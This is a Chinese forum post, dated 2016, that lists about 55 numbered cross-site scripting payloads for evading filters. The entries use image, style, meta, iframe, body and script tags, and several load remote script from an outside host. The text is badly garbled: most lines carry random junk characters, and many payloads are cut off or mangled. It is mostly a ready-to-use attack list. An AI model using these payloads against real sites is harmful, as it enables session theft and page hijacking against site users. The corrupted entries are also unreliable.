(1)普通的XSS JavaScript注入* `" B3 i- S. u: b9 h" |; }0 D
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>* i. m- V; `: |4 \$ E T' |
(99)另类弹框
/ j7 B7 \) ?9 ?8 a2 x b<q/oncut=alert()>1
: O$ F- a" t# P<s/onclick=alert()>b
$ X9 x7 ?" s3 g7 F/ Z! N$ {" z. M <XSS=" onclick="alert(1)//">clickme</SSX=">1 @, T- I% F/ }+ n/ N- y9 c
<zzz onclick=alert`1`>clickme</zzz>
; g& y) i" r; X2 U& X* Z <a onclick=alert`1`>clickme</a>
, E4 L* V3 g6 |- W<a=">clickme</a=">) K- k2 @' ~& p& F B
<a=">clickme</a>
( Y M1 Y" B) R5 n7 F& i<z=">clickme</z=">
6 h2 d2 |% y2 D& T. P<z onclick=alert`1`>clickme</z>
9 V% U! y! N2 v6 ~6 B. P1 d7 u- x: D" |4 T5 n4 r8 W* R
(2)IMG标签XSS使用JavaScript命令
0 T1 V7 K* d+ N; E" k8 ~( k' ^& c<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>6 M0 ~ d1 P: }: Q4 p. {
~$ f5 \% N" C) t& w1 e7 X! A: d
(3)IMG标签无分号无引号2 {+ \7 m# c% x9 R' j. I
<IMG SRC=javascript:alert(‘XSS’)>7 G: p' }0 u+ n0 c. i* L! `
+ q5 d* s H5 m$ n( A4 I1 @
(4)IMG标签大小写不敏感
* ^: Z" d R# V: U0 |<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
# A! f0 r2 h2 D( H s- H$ ?3 V. I! o( L
(5)HTML编码(必须有分号)
6 q5 K* L+ f0 U( B* ]<IMG SRC=javascript:alert(“XSS”)>5 X& k# O6 \. f) L5 p$ \
0 Z- v4 z* q( Y6 R" I7 O(6)修正缺陷IMG标签
) k, U: H- h' d8 k0 R* W<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
9 {$ u( T3 \9 [1 Y1 o1 A) ~! O# j8 X+ y0 K% P
(7)formCharCode标签(计算器)- O, x! v L# `# t
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>9 W" T5 R2 p4 O* T, x0 c" ?
2 {2 a, p l2 b3 @/ t
(8)UTF-8的Unicode编码(计算器)
5 a- l c$ l" w) E# v: I. e<IMG SRC=jav..省略..S')>% [/ S. T0 O2 Z3 u
/ q% d" z3 b, n- ~! L/ g3 i7 o" u3 Y
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)0 P2 T) R% | \' e3 B. A
<IMG SRC=jav..省略..S')>
' ^5 b5 K& i" Q
# @7 k/ q6 W Q, p5 G' m1 g, k6 Q(10)十六进制编码也是没有分号(计算器)
5 K6 g5 l4 Y* w# o: E<IMG SRC=\'#\'" /span>8 T* {# a- \) }6 b2 @, ~; @4 O2 z3 |
R7 {& }# z0 ?& ^8 W- m) \
(11)嵌入式标签,将Javascript分开/ o% i m" A: d0 w0 z
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>, l5 }6 {8 L2 j* `6 a' P
9 R P* I" i. W! v! w% c(12)嵌入式编码标签,将Javascript分开+ y' k2 O% Z8 H `0 [ S+ _
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>0 ^# w' t6 ~- s+ J
5 j; f& y2 G2 }0 B, h; [7 G; W! x
(13)嵌入式换行符
( S$ ]/ k1 [- Z( {<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>4 J# ~+ f% }+ G+ a/ F5 S" N
& Y& T! ^& e9 z(14)嵌入式回车2 N! k6 z5 g4 P8 W! x0 K" @
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>: i$ \$ ~9 ^" U$ ]" v W4 O; D0 Y
, Y6 N& q6 }! @(15)嵌入式多行注入JavaScript,这是XSS极端的例子. i3 a+ ~3 d! U& z. `8 C' t
<IMG SRC=\'#\'" /span>
' H& d' K) e$ f9 }2 a2 ~2 Z1 I l% w$ V
(16)解决限制字符(要求同页面)
( l% C) V6 X( x1 N<script>z=’document.’</script>
x" c; r! h& f% R* j# X<script>z=z+’write(“‘</script>
) w2 s2 ^* O+ e<script>z=z+’<script’</script>* \- t1 \5 j) `8 _% P
<script>z=z+’ src=ht’</script>
, |5 K3 {' d' l5 ]<script>z=z+’tp://ww’</script>6 b* W8 O* n- U/ s; ^& M2 g2 `
<script>z=z+’w.shell’</script> @+ M m) D3 l" j# @
<script>z=z+’.net/1.’</script>! i( s' L) m" s1 t4 s: L0 p
<script>z=z+’js></sc’</script>
! [- e: d8 q# [% O+ | Q+ y! z' K<script>z=z+’ript>”)’</script>4 I/ H. x7 N. k5 S) C
<script>eval_r(z)</script>$ J1 Q" f2 I, m1 q( S4 i
8 R) m7 s) j b2 B5 w, N$ z
(17)空字符
/ w! y [( E0 Y- c2 E2 s1 Mperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
+ D8 g* Q3 ^' p
3 t2 w9 n8 k3 _; t4 [(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
& w" C: G$ n2 s* Z& Nperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out0 n: P- ~( X: I7 i
8 a# {& L, u' }. J3 r" e+ e" z3 S(19)Spaces和meta前的IMG标签
/ q; C( H* ?+ m- ~( S$ }% O<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
2 b3 {, b# P& @# _& [* q" f* e G! z! g5 V7 b0 T# ~
(20)Non-alpha-non-digit XSS
: Z$ A: ]( r0 z& v, G: f<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>% F4 x7 R+ ]$ s9 ^" F5 H' g5 M( x
% P& l+ R: l0 u1 p, y+ ~
(21)Non-alpha-non-digit XSS to 2
9 W, n3 K9 H! w- S: d* ^0 ?+ @/ w<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
8 n+ @( R5 W N* @" N: s4 i
. Z$ s# C. n" j5 K& S(22)Non-alpha-non-digit XSS to 3
- I m8 r. ~. W$ a. ?3 o<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>8 x1 ?, m" F% X" F3 I
' \6 w/ B0 l4 \& y& }% _% A(23)双开括号- c) W9 L8 f8 ?9 |* ]7 k* b# l
<<SCRIPT>alert(“XSS”);//<</SCRIPT>* D# |8 u$ w* c* c# r1 ?
/ x4 L+ K* m3 }- |
(24)无结束脚本标记(仅火狐等浏览器)
) }9 m- ]5 H% W<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>% U( s; ?: e* c# V( i
- @3 R; n) v) ~ B- N' C+ f: e
(25)无结束脚本标记2
3 Z, X# u" @7 q7 m5 p5 B+ J<SCRIPT SRC=//3w.org/XSS/xss.js>, q8 N) f' j/ O4 n9 A
5 C% \; B! `) l' h' Q) p. | Z(26)半开的HTML/JavaScript XSS; j4 `0 o5 u% k0 ~7 g& r
<IMG SRC=\'#\'" /span>
% [8 s3 y+ }2 p G0 ]* t, a
. Z3 X Q& w8 j(27)双开角括号
) w. u" g3 U0 Q<iframe src=http://3w.org/XSS.html <
% [# _8 S4 g! O5 c6 ~ r
% c; X% z4 V* T. f7 a(28)无单引号 双引号 分号
9 T7 v: b; Z @& }' ]9 \<SCRIPT>a=/XSS/
: u% l: { B, c, q( H' E4 Malert(a.source)</SCRIPT>, M. j) t2 H6 S" z
4 ]! F' q5 M& Z% G6 Q2 s
(29)换码过滤的JavaScript( K( [* E6 _/ o; U
\”;alert(‘XSS’);//
$ g+ o4 R# `' f& c4 u1 L1 b/ S2 H& m+ U6 J8 E- }- j" a% \ q3 R
(30)结束Title标签- J @+ r3 a: L+ ^$ v
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
, f0 T- t4 R2 A; ]5 |2 W+ n
# J" O" @ ^3 \(31)Input Image
2 U# E+ S9 Q: j, k8 {<INPUT SRC=\'#\'" /span>! W7 b" N& F8 E8 d `
% E+ A, `( [. O# r6 F
(32)BODY Image
7 }( Q3 h% E2 _! S6 E/ V" t! p<BODY BACKGROUND=”javascript:alert(‘XSS’)”>0 G @0 R0 O) c9 m7 \9 ^
M. @% G% v/ i1 X' S; X/ m(33)BODY标签" \" L6 u7 O5 W3 C0 `- z
<BODY(‘XSS’)>4 o/ p ?/ J# r7 F
. I9 T# _5 E$ j(34)IMG Dynsrc
! N8 D& I5 }" o5 i5 O4 }# g+ V8 v<IMG DYNSRC=\'#\'" /span>
2 R/ Y t0 D8 N8 ]% ]- _1 {3 X# Q) W' ~2 F
(35)IMG Lowsrc/ R* n' S- A* l# U. c
<IMG LOWSRC=\'#\'" /span>) ?/ ?2 t7 m5 j
: D3 h* t4 x o U8 [(36)BGSOUND' m7 @4 H9 s& o$ i% u) d
<BGSOUND SRC=\'#\'" /span>6 W. y- t9 Y' R7 ?, a, o
& _/ D' h, K! ]# D% J! a(37)STYLE sheet
$ t; U: k; X/ m% k4 L) U6 I<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>( X" |( f3 b4 O1 p z+ v
! ]$ f; g5 u5 n, n1 }(38)远程样式表1 \( v# ?7 t& E. U4 {
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
% {) i d+ s1 o I9 @" a: i$ O" t6 u( z- h0 \& h" k* h+ S! t
(39)List-style-image(列表式)0 R6 y6 r7 J& S& a. \2 r
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS) R! Y7 ?5 H0 Q1 @
8 ?6 N, a2 [- f0 r; n(40)IMG VBscript0 G# }* a5 v3 x( Q J
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS) t# M- {1 {- M/ S. i' u
4 e [# _( C3 p6 ~ Z& I2 K
(41)META链接url, b! p" Y) b+ v7 g; a
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
! @. Y1 E1 v, c \1 o& X% _8 y7 |! I' l: H) h0 |
(42)Iframe& y7 r1 e' P9 u% U4 X
<IFRAME SRC=\'#\'" /IFRAME>
& L: l4 z5 s8 X6 x4 z* y$ E" K
(43)Frame) f) `+ x1 N) x: V: m
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>1 w7 d2 a2 b. {; p. f! K
) p* |$ n% N9 W7 l, Q(44)Table
0 h8 E0 W8 Z: Y' y$ Z<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
! x# A: x( x# C: S d
& ^( L& E5 U( Q& H5 P1 f(45)TD
5 |$ J4 T8 u& w9 I/ i1 u b<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>0 O! O1 q' I: `% m- w
2 w) P8 ` L; i% i9 d" X(46)DIV background-image
4 Y8 I6 h7 S/ H9 ?<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
1 Y" u1 b& n" e E
3 B+ F- z* c, d2 s(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
5 r4 Y. Y( U9 O! Y* ~6 E<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>: g7 B J. G& D. `/ A
" ?; Y% Y3 F' K* C: M3 i3 D1 b(48)DIV expression
0 a8 x( C, w; _! Q1 G<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
6 Y5 T) X- D7 S* d9 }4 k
- A% J& a9 ~5 @( h% `(49)STYLE属性分拆表达! q7 `: B: l: F5 k7 s3 A
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
5 z1 f/ K: z- ]- k( v0 ^
& G. ^; B( c4 H- w6 K3 n6 e5 ^- c }+ q(50)匿名STYLE(组成:开角号和一个字母开头)& `) f; l1 }& \9 o! M- K3 T6 O
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
0 o i* C& A+ X" ]# L7 }; j
+ g7 V* ^9 d8 o(51)STYLE background-image
$ P& I: [1 y$ C3 t) |* S<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
2 ]# F0 Y* Q) m& z* c( `, _! l4 k/ ~4 B& K
(52)IMG STYLE方式
* E9 m8 F' { G$ }! T8 kexppression(alert(“XSS”))’>2 A" ~) U4 E2 N- K& Z7 N
2 [: \: N' L# R9 Z1 B6 F5 m' {
(53)STYLE background5 G9 N& q7 h% {7 n# g
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>- T0 |( `- K9 K5 i! J
' K) B& q( k$ h8 Q
(54)BASE; w. _: b: n6 c& @4 I
<BASE HREF=”javascript:alert(‘XSS’);//”>
* J5 ]! i& ^! X% b6 o+ |- T
9 i) _1 r5 c/ C1 M(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
, z' c: `6 L: C% I" Q$ w% M<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
2 _ v( T5 A* N2 m! V! C9 A |
发表于 2016-4-28 10:06:15
收藏
支持
反对